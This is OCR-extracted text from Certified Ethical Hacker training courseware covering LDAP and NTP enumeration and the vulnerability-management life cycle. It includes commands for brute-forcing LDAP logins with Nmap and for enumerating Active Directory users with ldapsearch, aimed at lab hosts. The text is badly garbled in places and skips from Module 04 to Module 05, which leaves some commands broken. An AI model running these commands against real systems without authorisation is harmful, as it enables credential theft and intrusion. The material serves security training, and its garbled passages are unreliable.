Source: https://nmap.org Attackers use the ldap-brute NSE script to brute-force LDAP authentication. By default, it uses the built-in username and password lists. The userdb and passdb script arguments can be employed to use custom lists. nmap -p 389 --script ldap .base='"cn=users ,dc=CEH,dc=com

PORT

STATE

389/udp open

MAC

Addre:

Nmap done: @

SERVICE

dap

00:15:5D:01:80:02

1 IP address

(Microsoft)

(1 host up) scanned in 0.21 seconds

rot

nmap -p 389 ipt_ldap-brute Starting Nmap 7.92 ( https://nmap.org Nmap scan report for 10.10.1.22 Host is up (0.0014s latency) PORT

B89/tcp

"'

ldap-brute --script-args

--script-args \dap.t ae ) at 2022-03-29 06:09 E

C=CEH,

dc=com"*

10.10.1

STATE SERVICE open

ldap

ldap-brute

cn=admin, cn=users , de é cn=adi trator, cn=use cn=webadmin,

'

}

lid credential Valid credentials Valid credentials t Valid credential => Valid credentials Valid

MAC Address Nmap

done:

‘i 1 IP

(Microsoft)

:80:02 address

(1

host

up)

scanned

Valid credenti > Valid credential Valid credential => Valid credential: in

0.46

seconds

Figure 4.15: Screenshot showing output of the Nmap Idap-brute NSE script

Module 04 Page 437

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

LDAP Enumeration Tools Softerra

CE H

Softerra LDAP Administrator provides various

LDAP _| features essential for LDAP development, Administrator | deployment, and the administration of directories

tps:/humueldopadministatoncom OtherLDAP

Enumeration Tools:

oan

en

AD Explorer

hetps://docs.mirosoftcom

ldapsearch

Attackers use Idapsearch for enumeratingAD users. attackers to establish a connection with an | Itallows LDAP serverto perform different searches using specific filters

= LDAP Admin Tool

taf ibepsof.com

LDAP Search

LDAP Account Manager

https://securtyeploded.com

tps: /ww dep-occount-manager.°9 Copyright © by

Al Rights

ty Prohibited

LDAP Enumeration Tools There are many LDAP enumeration tools that access directory listings within Active Directory ‘AD) or other directory services. Using these tools, attackers can enumerate information such as valid usernames, addresses, and departmental details from different LDAP servers. =

Softerra LDAP Administrator

Source: https://www.|dapadministrator.com Softerra LDAP Administrator is an LDAP administration tool that works with LDAP servers such as Active Directory (AD), Novell Directory Services, and Netscape/iPlanet. It browses and manages LDAP directories. As shown in the screenshot, attackers use Softerra LDAP Administrator to enumerate user details such as the username, email address, and department.

Module 04 Page 438

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

FG Softerra LDAP Administrator



¥

©

fii > Production > example.com » OU=London Office >

|

File Edit View Favorites Server Entry Schema Tools Window Help

Qnw¢ BX



RO,

+ a x [Name ¥ Disabled (4) fn fn fn mn

8- AYRE AF

21

Value

GR

mai

Quick Searc

* Cobjecciass--)

separmment

Maya Bi Sofa Hope Toby Allan Toby Lynch

[email protected] [email protected] [email protected] [email protected]

T ‘Accounting ‘Accounting T

‘Aaron Barton

[email protected]

Tr

¥ Enabled (54)

fi OU-Berin Office

20

2 ie al Ou=New York office i OU=Paris Office ii OU=Toki office 1B Testes

aa on on on ow wn on on or wn on on

Abigal Murphy Alexander Holt ‘Alexander Marsden Alexandra Flynn Aloe Icbal ‘mela Owen Amy Lucas ‘Annie Douglas Anthony Gough Charlie Todd Charlotte Rowe Chelsea Hyde

a.murphy exemle.com [email protected] [email protected] [email protected] aigbal @exemple.com [email protected] [email protected] [email protected] [email protected] tod @exemple.com [email protected] [email protected]

sales 1 ‘Accounting sales 7 HR HR Sales ‘Accounting T Sales Sales

Figure 4.16: Screenshot of Softerra LDAP Administrator

ldapsearch

Source: https://linux.die.net ldapsearch is a shell-accessible interface for the ldap_search_ext (3) library call. ldapsearch opens a connection to an LDAP server, binds it, and performs a search using the specified parameters. The filter should conform to the string representation of the search filters, as defined in RFC 4515. If not provided, the default filter, (objectClass=*), is used. If ldapsearch finds one or more entries, the attributes specified by attrs are returned. If * is listed, all user attributes are returned. If + is listed, all operational attributes are returned. If no attrs are listed, all user attributes are returned. If only 1.1 is listed, no attributes are returned. The search results are displayed using an extended version of the LDAP Data Interchange Format (LDIF). The option -1 controls the output format. Attackers use ldapsearch to enumerate AD users. This allows attackers to establish connections with an LDAP server to perform different searches using specific filters. The following command can be used to perform an LDAP search using simple authentication: ldapsearch

Module 04 Page 439

-h

-x

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

If the above command is executed successfully, the following command can be executed to obtain additional details related to the naming contexts: ldapsearch

-h

-x

-s

base

namingcontexts

For example, from the output of the above command, if the primary domain component can be identified as Dc=htb , DC=local, the following command can be used to obtain more information about the primary domain: ldapsearch

-h

-x

-b

“DC=htb,DC=local”

The following commands can be used to retrieve information about a specific object or all the objects in a directory tree: ldapsearch

-h

Address>

retrieves

-b

"DC=htb,DC=local"

to the

object

class

"DC=htb,DC=local"

> retrieves information related to all the objects in the directory

The following command retrieves a list of users belonging to a particular object class: ldapsearch -h '(objectClass=

-x -b "DC=htb,DC=local" ' sAMAccountName sAMAccountType x -s base namingce

ap

ee

Edit attacker@par $sud ord for att @parrot lapsearch -h 10.10.1.22

s base namingcontexts|

d LDIF

LDAPv3 base = (default) with scope baseObject (objectcl ng: namingcon

m

=Configuration,DC=CEH, DC=com hema,

C(N=Configuration,DC=C

DomainDnsZone:

# numRespons #

numEntrie

Figure 4.17: Screenshot of ldapsearch Module 04 Page 440

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

The following are some additional LDAP enumeration tools:

=

AD Explorer (https://docs. microsoft.com)

=

LDAP Admin Tool (https://www./dapsoft.com)

=

LDAP Account Manager (https://www.I|dap-account-manager.org)

=

LDAP Search (https://securityxploded.com)

Module 04 Page 441

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

LO#05: Use Different Techniques for NTP and NFS Enumeration

NTP and NFS Enumeration Administrators often overlook the Network Time Protocol (NTP) server when considering security. However, if queried properly, it can provide valuable network information to an attacker. Therefore,

it is necessary to know what

information

an attacker can obtain

about

a

network through NTP enumeration. The Network File System (NFS) is used for the management of remote file access. NFS enumeration helps attackers to gather information such as a list of clients connected to the NFS server, along with their IP addresses, and exported directories. This section describes NTP enumeration, the information extracted via NTP enumeration, various NTP enumeration commands, NTP enumeration tools, and NFS enumeration techniques and

tools.

Module 04 Page 442

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Enumeration

CEH

NTP Enumeration Network Time Protocol (NTP) is designed to synchronize the clocks of networked computers It uses UDP port 123 as its primary means of communication

Attackers query the NTP server to gather valuable information, such as @

List of connected hosts

®

Clients IP addresses in a network,

their system names, and OSs

© Internal IPs can also be obtained if the NTP server is in the demilitarized zone (DMZ)

NTP can maintain time to within 10 milliseconds

(1/100 second) over the public Internet

It can achieve accuracies of 200 microseconds or better

in local area networks under ideal conditions

NTP Enumeration NTP is designed to synchronize clocks of networked computers. It uses UDP port 123 as its primary means of communication. NTP can maintain time within an error of 10 ms over the public Internet. Furthermore, it can achieve an accuracy of 200 us or better in LANs under ideal conditions.

The following are some pieces of information an attacker can obtain by querying an NTP server:

=

List of hosts connected to the NTP server

=

Clients IP addresses in the network, their system names, and OSs

=

Internal IPs, if the NTP server is in the demilitarized zone (DMZ)

Module 04 Page 443

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

@

@

CE H

Commands

NTP Enumeration ntptrace

© Traces a chain of NTP servers back to the primary source

@ ntptrace

ntpde

[-n]

[-m maxhosts]

[-c command]

© Monitors NTP daemon

[servername/IP_address]

[host]

(ntpd) operations and

determines performance

~

© Monitors operation of the NTP daemon, ntpd @ ntpde [-ilnps]

@ ntpq

pq [-inp] amp] © ntteeg

[...]

[-c command] 1 (hese) [hos Thesentpg queriescan be ‘usedt obtain addtional NTP serverinformation

‘These ntpdc queries can be used ‘0 obtain additional NTP server information

Copyright © by

NTP Enumeration Commands NTP

enumeration

commands

such

as ntpdate,

ntptrace,

ntpdc,

and

ntpq are used

to query

an

NTP server for valuable information. ntpdate This command collects the number of time samples from several time sources. Its syntax is as follows: ntpdate version]

[-46bBdqsuv] [-p

samples]

[-a [-t

key]

[-e

timeout]

authdelay] [

-U

user_name]

[-k

keyfile] server

-4

Force DNS resolution of given host names to the IPv4 namespace

-6

Force DNS resolution of given host names to the IPv6 namespace

-a

key

[-o

[...]

Enable the authentication function/specify the key identifierto be used for authentication

-B

Force the time to always be slewed

-b

Force the time to be stepped

-d

Enable debugging mode

-e

authdelay | Specify the processing delay to perform an authentication function

-k

keyfile

-o

version

:

Module 04 Page 444

Specify the path for the authentication key file as the string is /etc/ntp/keys

“keyfile”; the default

Specify the NTP version for outgoing packets as an integer version, which can be 1 or 2; the default is 4

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

-p

Exam 312-50 Certified Ethical Hacker

Specify the number of samples to be acquired from each server, with values

samples

.

.

ranging from 1-8; the default is 4

-q

Query only; do not set the clock

-s

Divert logging output from the standard output (default) to the system syslog facility

-t

timeout

Specify the maximum wait time for a server response; the default is 1s

-u

Use an unprivileged port for outgoing packets

-v

Be verbose; logs ntpdate’s version identification string

Table 4.4: ntpdate parameters and their respective functions erminal h

Terminal

—[attacker@parrot isntpdate

21 Mar 020

07:41:26

(1)

Looking

for

-d

10.10.1.22|

ntpdate[72982]:

host

10.10.1.22

and

ntpdate

[email protected]

service

ntp

Wed

Sep

23

11:46:38

UTC

2

host found : 10.10.1.22 transmit(10.10.1.22)

receive(10.10.1.22)

transmit(10.10.1.22) receive(10.10.1.22)

transmit(10.10.1.22)

receive(10.10.1.22)

transmit(10.10.1.22)

receive(10.10.1.22)

server

stratum refid

10.10.1.22,

5,

precision

port

[86.77.84.80],

reference

originate ‘transmit

time:

timestamp:

timestamp:

-23,

root

123

leap

delay

00,

trust

0.000244,

000

root

dispersion

eSe2e2db.4d87bdcf

Mon,

Mar

21

2022

e5e2e2ec.al4a0bbd

Mon,

Mar

21

2022

eS5e2e2ec.al7fb4ec

Mon,

Mar 21 2022

filter

delay:

0©.02805

0.02753

0.02626

0.02803

filter

offset:

-0.000347

-0.001205

-0.000676

-0.000396

dispersion

0.00035,

delay 21

Mar

0.02626, 07:41:32

ntpdate[72982]:

attacker@parrot $

offset

adjust

time

0.010193

7:41:15.302

-0.000676 server

10.10.1.22

offset

-0.000676

sec

Figure 4.18: Screenshot of the ntpdate command, showing debugging information for a given IP

Module 04 Page 445

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

ntptrace This command determines where the NTP server obtains the time from and follows the chain of NTP servers back to its primary time source. Attackers use this command to trace the list of NTP servers connected to the network. Its syntax is as follows: ntptrace

[-n]

[-m

maxhosts]

[servername/IP_address]

Do not print host names and show only IP addresses; may be useful if a name server

-n

is down

-m maxhosts | Set the maximum

number of levels up the chain to be followed

Table 4.5: ntptrace parameters and their respective functions

Example: #

ntptrace

localhost:

stratum

4,

offset

0.0019529,

10.10.0.1:

stratum

2,

offset

0.01142

73,

synch

10.10.1.1:

distance

synch

distance

0.143235

synch

distance

0.011193

0.115554

stratum

1,

offset

0.0017698,

ntpdc This command queries the ntpd daemon regarding its current state and requests changes in that state. Attackers use this command to retrieve the state and statistics of each NTP server connected to the target network. Its syntax is as follows: ntpde

[

-46dilnps

]

[

-c

command]

[hostname/IP_address]

-4

Force DNS resolution of the given host name to the IPv4 namespace

-6

Force DNS resolution of the given host name to the IPv6 namespace

-d

Set the debugging mode to on

-c

Following argument is interpreted as an interactive format command; multiple -c options may be given

Search the Site

Home

About

CWE List

Search the CWE

Web

Scoring

Mapping Guidance

Community,

Site Search

To search the CWE Web site, enter a keyword by typing in a specific term or multiple keywords separated by a space, and click the Google ‘Search button or press return. SMB

x

About 55 results (0.15 seconds)

CWE-284: Improper Access Control (4.6) - CWE owe mitre org » CWE List

‘Common Weakness Enumeration (CWE) is a list of software weaknesses.

‘CWE-200:

Exposure of Sensitive Information to an ... - CWE

‘CWE-295:

Improper Certificate Validation (4.6) - CWE

‘cwe mitre.org » CWE List ‘Common Weakness Enumeration (CWE) is a list of software weaknesses.

‘ewe mitre.org » CWE List The software does not validate, or incorrectly validates, a certificate. + Extended Description. When a certificate is invalid or malicious, it might allow

CWE-427: Uncontrolled Search Path Element (4.6) - CWE ‘ewe mitre org > CWE List {the directory from which the program has been loaded; the current working directory. In some cases, the attack can be conducted remotely, such as when SMB or ‘CWE-582:

Files or Directories Accessible to External Parties (4.6)

‘owe mitre.org » CWE List This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and

CWE-313: Cleartext Storage in a File or on Disk (4.6) - CWE ‘ewe mitre.org > CWE List ‘Common Weakness Enumeration (CWE) is a ist of software weaknesses Figure 5.5: Screenshot showing CWE results for SMB query

Module 05 Page 532

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

ay: : Vulnerability-Management Life Cycle

ee

Pre-AssessmentPhase Identify Assets and

Create a Baseline

Post Assessment Phase

ae E>

7

—_)

ig || EH

Vulnerability Scan

§«—Risk Assessment

¥ Remediation

4 Verification

Monitoring

Copyright © by

Vulnerability-Management Life Cycle The vulnerability management life cycle is an remediate security weaknesses before they can posture and policies for an organization, creating assessing the environment for vulnerabilities and

important process that helps identify be exploited. This includes defining the a complete asset list of systems, scanning exposures, and taking action to mitigate

vulnerabilities that are identified. The implementation

of a vulnerability management

and risk and the

lifecycle

helps gain a strategic perspective regarding possible cybersecurity threats and renders insecure computing environments more resilient to attacks.

Vulnerability management should be implemented in every organization as it evaluates and controls the risks and vulnerabilities in the system. The management process continuously examines the IT environments for vulnerabilities and risks associated with the system. Organizations should maintain a proper vulnerability management information security. Vulnerability management provides the implemented in a sequence of well-organized phases.

Module 05 Page 533

program to ensure overall best results when it is

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

The phases involved in vulnerability management are:

=

Pre-Assessment Phase o

=

Vulnerability Assessment Phase o

=

Identify Assets and Create a Baseline

Vulnerability Scan

Post Assessment Phase o

Risk Assessment

o

Remediation

o.

Verification

o

Monitoring

Module 05 Page 534

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Pre-Assessment

Phase

C iE H

Identify

Assets and Createa Baseline

©00000000

Identify and understand business processes Identify the applications, data, and services that support the business processes and perform code reviews

Identify approved software, drivers, and the basic configuration of each system Create an inventory of all assets, and prioritize/rank critical assets Understand the network architecture and map the network infrastructure

Identify the controls already in place Understand policy implementation and standards compliance Define the scope of the assessment Create information protection procedures to support effective planning, scheduling, coordination, and logistics

Pre-Assessment Phase Identify Assets and Create a Baseline The pre-assessment phase is a preparatory phase, which involves defining policies and standards, clarifying the scope of the assessment, designing appropriate information protection procedures, and identifying and prioritizing critical assets to create a good baseline for vulnerability management and to define the risk based on the criticality and value of each system. This phase involves the gathering of information about the identified systems to understand the approved ports, software, drivers, and basic configuration of each system in order to develop and maintain a system baseline. The following are the steps involved in creating a baseline: Identify and understand business processes

2.

Identify the applications, data, and services that support the business processes and perform code reviews

NOWBF Ww

1.

Identify the approved software, drivers, and basic configuration of each system Create an inventory of all assets, and prioritize or rank the critical assets

Understand the network architecture and map the network infrastructure Identify the controls already in place Understand

processes 8.

policy

implementation

and

practice

standard

compliance

with

business

Define the scope of the assessment

Module 05 Page 535

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis 9.

Create information protection coordination, and logistics

Exam 312-50 Certified Ethical Hacker procedures

to support

effective

planning,

scheduling,

Classify the identified assets according to the business needs. Classification helps to identify the high business risks in an organization. Prioritize the rated assets based on the impact of their failure and their reliability in the business. Prioritization helps: =

Evaluate and decide a solution for the consequence of the assets failing

=

Examine the risk tolerance level

=

Organize methods for prioritizing the assets

Module 05 Page 536

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

©900O20060000

Vulnerability Assessment Phase

CE H

Examine and evaluate the physical security

4)

Check for misconfigurations and human errors

Q

Run vulnerability scans Select type of scan based on the organization or compliance requirements Identify and prioritize vulnerabilities

Identify false positives and false negatives Apply business and technology contextto scanner results Perform OSINT information gathering to validate the vulnerabilities

Createa vulnerability scan report

Vulnerability Assessment Phase This phase is very crucial in vulnerability management. The vulnerability assessment phase refers to identifying vulnerabilities in the organization’s infrastructure, including the operating system, web applications, and web server. It helps identify the category and criticality of the vulnerability in an organization and minimizes the level of risk. The ultimate goal of vulnerability scanning is to scan, examine, evaluate, and report the vulnerabilities in the organization’s information system. Vulnerability scans can also be performed on applicable compliance templates to assess the organization’s Infrastructure weaknesses against the respective compliance guidelines. The assessment phase involves examining the architecture of the network, evaluating threats to the environment, performing penetration testing, examining and evaluating physical security, analyzing physical assets, assessing operational security, observing policies and procedures, and assessing the infrastructure’s interdependencies. Steps involved in the assessment phase: 1.

Examine and evaluate the physical security

2.

Check for misconfigurations and human errors

3.

Run vulnerability scans using tools

4.

Select the type of scan based on the organization or compliance requirements

5.

Identify and prioritize vulnerabilities

6.

Identify false positives and false negatives

7.

Apply the business and technology context to scanner results

Module 05 Page 537

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

8.

Perform OSINT information gathering to validate the vulnerabilities

9.

Create a vulnerability scan report

Module 05 Page 538

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Post Assessment Phase Risk Assessment

CE H }

1

© Perform risk categorization

Remediation

© Prioritize remediation based on the risk ranking

© Develop an action plan to implement the recommendation/remediation © Perform root cause analysis © Apply patches/fixes Capture lessons learned

© Assess the level of impact © Determine the threat and risk levels

Conduct awareness training

Monitoring

f

1

© Periodic vulnerability scan and assessment

Verification

v

© Rescan of systemsto identify if applied fix has

remediated the vulnerability © Perform dynamic analysis © Review of attack surface

© Timely remediation of identified vulnerabilities © Intrusion detection and intrusion prevention logs © Implementation of policies, procedures, and

controls

e

=y

Peete

BD

Post Assessment Phase The post-assessment phase, also known as the recommendation phase, is performed after and based on risk assessment. Risk characterization is categorized by key criteria, which helps prioritize the list of recommendations. The tasks performed in the post-assessment phase include: =

Creating a priority list for assessment recommendations based on the impact analysis

=

Developing an action plan to implement the proposed remediation

=

Capturing lessons learned to improve the complete process in the future

=

Conducting training for employees

Post assessment includes risk assessment, remediation, verification, and monitoring.

=

Risk Assessment In the risk assessment phase, risks are identified, characterized, and classified along with the techniques used to control or reduce their impact. It is an important step toward identifying the security weaknesses in the IT architecture of an organization.

In this phase, all serious uncertainties that are and prioritized, and remediation is planned to risk assessment summarizes the vulnerability selected assets. It determines whether the moderate,

or low.

Remediation

is planned

associated with the system are assessed permanently eliminate system flaws. The and risk level identified for each of the risk level for a particular asset is high, based

on

the

determined

risk

level.

For

example, vulnerabilities ranked high-risk are targeted first to decrease the chances of exploitation that would adversely impact the organization. Module 05 Page 539

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

The tasks performed in the risk assessment phase include:

=

o

Perform risk categorization based on risk ranking (for example, critical, high, medium, and low)

o.

Assess the level of impact

o

Determine the threat and risk levels

Remediation Remediation is the process of applying fixes on vulnerable systems in order to mitigate or reduce the impact and severity of vulnerabilities. These include steps like evaluating vulnerabilities, locating risks, and designing responses for vulnerabilities. It is important for the remediation process to be specific, measurable, attainable, relevant, and timebound. This

phase

is initiated

assessment steps.

after

the

successful

implementation

of

the

baseline

and

The tasks performed in the remediation phase include:

=

o

Prioritize remediation based on the risk ranking

o

Develop an action plan to implement the recommendation or remediation

o

Perform a root-cause analysis

o

Apply patches and fixes

o

Capture lessons learned

o

Conduct awareness training

o

Perform exception be remediated

handling and risk acceptance for the vulnerabilities that cannot

Verification In this phase, the security team performs a re-scan of systems to assess if the required remediation is complete and whether the individual fixes have been applied to the impacted assets. This phase includes the verification of the remedies used to mitigate risks. It provides clear visibility into the firm and allows the security team to check whether all the previous phases have been perfectly employed or not. Verification can be performed by using various means such as ticketing systems, scanners, and reports. The tasks performed in the verification phase include: o

Rescanning the systems to identify if an applied fix is effective in remediating the vulnerability

o

Performing dynamic analysis

o

Reviewing the attack surface

Module 05 Page 540

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis =

Exam 312-50 Certified Ethical Hacker

Monitoring Organizations need to perform regular monitoring to maintain system security. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved. As per security best practices, all phases of vulnerability management must be performed regularly.

This phase performs incident monitoring using tools such as IDS/IPS, SIEM, and firewalls. It implements continuous security monitoring to thwart ever-evolving threats. The tasks performed in the monitoring phase include: o

Periodic vulnerability scan and assessment

o

Timely remediation of identified vulnerabilities

o

Monitoring intrusion detection and intrusion prevention logs

o

Implementing policies, procedures, and controls

Module 05 Page 541

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

C'EH

LO#02: Explain Vulnerability Classification and Assessment Types

Copyright © by’

Al Rights Reser

Vulnerability Classification and Assessment Types Any vulnerability that is present in a system the organization. It is important for ethical vulnerabilities that they can employ, along This section in the module discusses the

assessments.

Module 05 Page 542

can be hazardous and can cause severe damage to hackers to have knowledge about various types of with various vulnerability assessment techniques. various types of vulnerabilities and vulnerability

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Vulnerability Classification

CE H

= © Misconfiguration is the mostcommon vulnerability and is mainly caused by human error

Network Misconfigurations nee een persandserecstorers pees ei steko

©

Host Misconfigurations

Misconfigurations/Weak Configurations

Comets

Itallows attackers to break into a network and gain unauthorized

‘access to systems

© Application flaws are vulnerabilities in applications that are exploited by attackers © Flawed applications pose security threats such asdatatamperingand unauthorized access to configuration stores

Poor Patch Management Design Flaws Third-Party Risks

© Software vendors provide patches that prevent exploitations and reduce the probability of threats exploiting a specific vulnerability fal Unreahesleor warettanirelisenieepicstioniverten on tetice vulnerable to various attacks © Logical flaws in the functionality of the system are exploited by the attackers to bypass the detection mechanismand acquire access toa_ secure system

* [potcstons twoughwhch nancelnfomaton,cstomer and PP bu 4

‘employee data, and processes in the enterprise's supply chain can be compromised

© Open permissions and unsecured root accounts Buffer overflows, memory leaks, resource exhaustion, integer overflows, null pointer/object dereference,

__DLLinjection, race conditions, improper input handling, and improper error handling

© Unpatched servers, unpatched firmware, unpatched 3 0S, and unpatched applications © Incorrect encryption and poor validation of data

© Yendotmaragement hanandriskscloud-based outsourcedvs. code development, datasuply storage, on-premises risks p

cerved. Reproduction is Strictly Prohibited

Vulnerability Classification (Cont’d) Default installations/Defautt Configurations ions Operating System Flaws

Default Passwords 2ero-Day Vulnerable coacy

Platform Vulnerabilities

Sonera Improper Certificate and Key Management

CEH

© Failing to change the default settings while deploying softwareor hardware allowsthe attackerto guess the settingsto break into the system © Owing to 0S vulnerabilities, applications such as Trojans, worms, and viruses pose threats ‘Manufacturers provide users with default passwords to access the device during its intial set-up, which users ‘must change for future use

© When users forgetto update the passwordsand continue using the default passwords, they make devices and systems vinerable to various attacks, such as brute-forceand dictionary attacks © These are unknown vulnerabilities in software/hardware that are exposed but notyet patched © These vuinerabilties are exploited by the attackers before being acknowledged and patched by the software developers or security analysts © Legacy platform vulnerabilities are caused by obsolete or familar code © Legacy platforms are usually not supported when patching technical assets such as smartphones, computers, loT devices, OSes, applications, databases, firewalls, IDSes, or other network components This type of vulnerabilities can cause costly data breaches for organizations The system spraw vulnerability arises within an organizational network because ofan increased number of system or server connections without proper documentation or an understanding of ther maintenance © These assets are often neglected over time, making them susceptible to attacks

© Improper certificate and key management may lead to many vulnerabilities that allow attackers to perform password cracking and data exfiltration attacks © Storing or retaining legacy or outdated keys also poses major threats to organizations cerved. Reproduction is Strictly Prohibited

Vulnerability Classification Vulnerabilities present in a system or network are classified into the following categories: Misconfigurations/Weak Configurations

Misconfiguration is the most common vulnerability and is mainly caused by human error. It allows attackers to break into a network and gain unauthorized access to systems. Misconfigurations may occur both intentionally and unintentionally, and they affect web Module 05 Page 543

al Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

servers, application platforms, databases, and networks. Attackers can detect misconfigurations through various scanning techniques and then exploit backend systems. Therefore, administrators must change the default configuration of devices and optimize device security. Network Misconfigurations Frequent changes to network and security devices are inevitable and essential for business improvement. However, administrators should ensure that all network components are configured appropriately because any loops in the implemented changes can cause adverse effects on the network such as performance degradation, service outage, and network intrusions. The following are some examples of weak network configurations. °

Insecure Protocols Insecure protocols transmit information or data in plaintext without implementing any encryption techniques to secure the data. The use of vulnerable protocols causes authentication and integrity issues because attackers can leverage the unencrypted files or data transmission and tamper with the data in transit. Attackers can also gain remote access to the vulnerable system once they capture the credentials being shared in plaintext. This vulnerability can be avoided by removing devices operating on insecure protocols and deploying a centralized master node to update protocols. Open Ports and Services

User communications with an application or service can be achieved through TCP or UDP port numbers, which accept and transmit the information in the form of packets. The source and destination addresses can be identified through the unique IP addresses assigned to them. In addition to these, many ports operate in a network for specific services. Servers often operate with some open ports, but all open ports are not dangerous, unless they are misconfigured, unpatched, or implemented with poor security rules. However, the open ports must be limited and used only for important services. Leaving ports open for unnecessary services can invite new threats to the network. Open ports and services may lead to the loss of data or Denial-of-Service (DoS) attacks and allow attackers to perform further attacks on other connected devices. Administrators must continuously check for unnecessary or insecure ports and services to reduce the risk to the network. Errors

Improper configuration of applications or services can generate error reports while loading pages. Such error reports can provide detailed information to attackers searching for security flaws, application vulnerabilities, programming faults, or other exploits. Using outdated software can also generate security errors, which can be susceptible to remote attacks using techniques such as code injection to manipulate the application. To prevent this vulnerability, skilled programming practices need to

Module 05 Page 544

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

be adopted in such a manner that the application does not information that could help attackers exploit the application server. o

disclose

critical

Weak Encryption Implementing proper encryption methods can secure the data being transmitted across a network and the data saved on storage devices. The encrypted files can be accessed only with the corresponding decrypted key held by the client or application. Weak encryption can allow attackers to perform man-in-the-middle attacks, sniff the traffic to modify data, and then masquerade as the legitimate service to communicate with the end users with false information. The following are some causes of weak encryption:

=

e

Using a weak encryption algorithm

e

Key generation with guessable credentials

e

Insecure key distribution

Host Misconfigurations Attackers can exploit configuration flaws in the host server to manipulate the resources and gain remote administrator access. The debugging functions could be activated, and unknown users may gain administrative permissions. These vulnerabilities may allow attackers to evade authentication mechanisms and access critical information, possibly with elevated privileges. The following are some examples of weak host configuration. o

Open Permissions

Granting unnecessary permissions to a user or group of users to access applications or files can lead to security issues such as data leakage or corruption of system functionality. Managing permissions is a complicated task, where administrators or users can potentially make mistakes such as allowing unknown guests to read and write critical files. An attacker can also perform privilege escalation by using unnecessarily created accounts to access unprotected files or to run commands on the operating system (OS). o

Unsecured

Root Accounts

Using manufacturer-allotted default administrative account credentials for the database or applications can lead to system security issues. Failing to implement a secure password privacy policy can allow attackers to guess the credentials using different brute-force techniques. Application Flaws Application flaws are vulnerabilities in applications that are exploited by attackers. Applications should be secured using the validation and authorization of the user. Flawed applications pose security threats such as data tampering and unauthorized access to configuration stores. If applications are not secured, sensitive information may be lost or corrupted. Hence, developers

Module 05 Page 545

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

